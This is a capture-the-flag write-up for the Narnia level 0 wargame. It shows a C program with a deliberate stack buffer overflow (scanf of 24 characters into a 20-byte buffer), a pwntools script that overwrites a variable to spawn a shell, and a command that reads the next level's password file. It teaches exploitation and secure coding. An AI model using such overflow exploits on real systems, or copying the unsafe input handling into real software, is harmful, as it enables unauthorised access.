Narnia 0#

C File#

1
#include <stdio.h>
2
#include <stdlib.h>
3

4
int main(){
5
    long val=0x41414141;
6
    char buf[20];
7

8
    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
9
    printf("Here is your chance: ");
10
    scanf("%24s",&buf);
11

12
    printf("buf: %s\n",buf);
13
    printf("val: 0x%08x\n",val);
14

15
    if(val==0xdeadbeef){
16
        setreuid(geteuid(),geteuid());
17
        system("/bin/sh");
18
    }
19
    else {
20
        printf("WAY OFF!!!!\n");
21
        exit(1);
22
    }
23

24
    return 0;
25
}

Approach#

Looks like the code initially sets val to 0x41414141 and then only gives us a shell if val magically turns into 0xdeadbeef

However, since the scanf takes in 24 chars and the buffer is only 20 we can enter in some extra input that will overwrite val into 0xdeadbeef

Solution#

Now we write a quick pwntools solution to get our shell

1
from pwn import *
2
payload = b'A'*20
3
payload += p32(0xdeadbeef)
4

5
p = process("/narnia/narnia0")
6
p.sendline(payload)
7
p.interactive()

First we send 20 chars of random input to fill up buf then we add 0xdeadbeef which will overflow into val letting us pass the check

Finally we send this to the process and enter interactive so we can grab the password to the next level using cat /etc/narnia_pass/narnia1

I won’t be showing the passwords in this write up since the game is always running

Conclusion#

When writing c programs always make sure that the buffer is large enough to contain the users input including the null byte

Not doing this can risk a buffer overflow leading to vulnerabilies like this